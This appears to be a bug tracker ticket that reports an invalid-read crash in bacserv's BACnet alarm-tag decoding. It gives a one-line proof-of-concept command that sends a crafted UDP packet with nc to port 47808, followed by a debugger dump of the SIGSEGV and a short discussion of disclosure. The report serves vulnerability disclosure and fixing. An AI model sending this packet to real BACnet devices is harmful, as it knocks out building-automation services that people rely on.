Menu

#62 Invalid read in bacserv when decoding alarm tags

v0.8.6
accepted
1
2019-06-15
2019-05-28
Anonymous
No

bacserv contains an invalid read in bacdcode.c when parsing alarm tag numbers. This leads to bacserv crashing. You can test with the following:
echo -ne "\x81\x04\x00\xa6\xc0\xa8F\x8d\x88\xa2\x01\x07\x00\x00\x00\x00\r\xff\xff" | nc -u $IP 47808

───────────────────────────────────────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────────────────────────────────────
► 0x5555555a1e8d <decode_tag_number+44> mov al, byte ptr [rbp]
0x5555555a1e90 <decode_tag_number+47> mov dl, al
0x5555555a1e92 <decode_tag_number+49> and edx, 0xfffffff0
0x5555555a1e95 <decode_tag_number+52> cmp dl, 0xf0
0x5555555a1e98 <decode_tag_number+55> jne decode_tag_number+178 <0x5555555a1f13>

0x5555555a1f13 <decode_tag_number+178> test rbx, rbx
0x5555555a1f16 <decode_tag_number+181> je decode_tag_number+266 <0x5555555a1f6b>

0x5555555a1f6b <decode_tag_number+266> mov eax, 1
0x5555555a1f70 <decode_tag_number+271> pop rdx
0x5555555a1f71 <decode_tag_number+272> pop rbx
0x5555555a1f72 <decode_tag_number+273> pop rbp
────────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd600 —▸ 0x5555555a20af (decode_tag_number_and_value) ◂— 0x5441554156415741
01:0008│ 0x7fffffffd608 —▸ 0x7fffffffd630 ◂— 0x41b58ab3
02:0010│ 0x7fffffffd610 ◂— 0x55555482e18f
03:0018│ 0x7fffffffd618 —▸ 0x5555555a2974 (decode_is_context_tag_with_length+193) ◂— 0x8244c8b48f6894c
04:0020│ 0x7fffffffd620 —▸ 0x7fffffffd630 ◂— 0x41b58ab3
05:0028│ 0x7fffffffd628 —▸ 0x7fffffffd650 —▸ 0xff010000 ◂— 0x0
06:0030│ 0x7fffffffd630 ◂— 0x41b58ab3
07:0038│ 0x7fffffffd638 —▸ 0x5555555d9e01 ◂— 0x3120312032332031 / '1 32 1 13 my_tag_number ' /
──────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────
► f 0 5555555a1e8d decode_tag_number+44
f 1 5555555a2974 decode_is_context_tag_with_length+193
f 2 5555555a35ad decode_context_object_id+207
f 3 5555555d1d77 alarm_ack_decode_service_request+187
f 4 5555555be291 handler_alarm_ack+487
f 5 5555555a137f apdu_handler+1269
f 6 5555555ba123 npdu_handler+629
f 7 55555557d1b2 main+801
f 8 7ffff6a4ab97 __libc_start_main+231
Program received signal SIGSEGV (fault address 0x55555482e18f)</decode_tag_number+273></decode_tag_number+272></decode_tag_number+271></decode_tag_number+266></decode_tag_number+181></decode_tag_number+178></decode_tag_number+55></decode_tag_number+52></decode_tag_number+49></decode_tag_number+47></decode_tag_number+44>

Discussion

  • Anonymous

    Anonymous - 2019-06-08

    Nice catch I sent same and more issues like this on #61. Also from my point of view this issues should follow a Coordinated Vulnerability Disclosure (CVD). This process allows independent reporters who discover a vulnerability contact the product owner directly and allow them the opportunity to investigate and remediate the vulnerability before the reporter discloses the information to the public... And also was created a CVE without any product owner knowledge... so no nice from your side to be honest.

     
  • Steve Karg

    Steve Karg - 2019-06-15
    • status: open --> accepted
    • assigned_to: Steve Karg
     

Anonymous
Anonymous

Add attachments
Cancel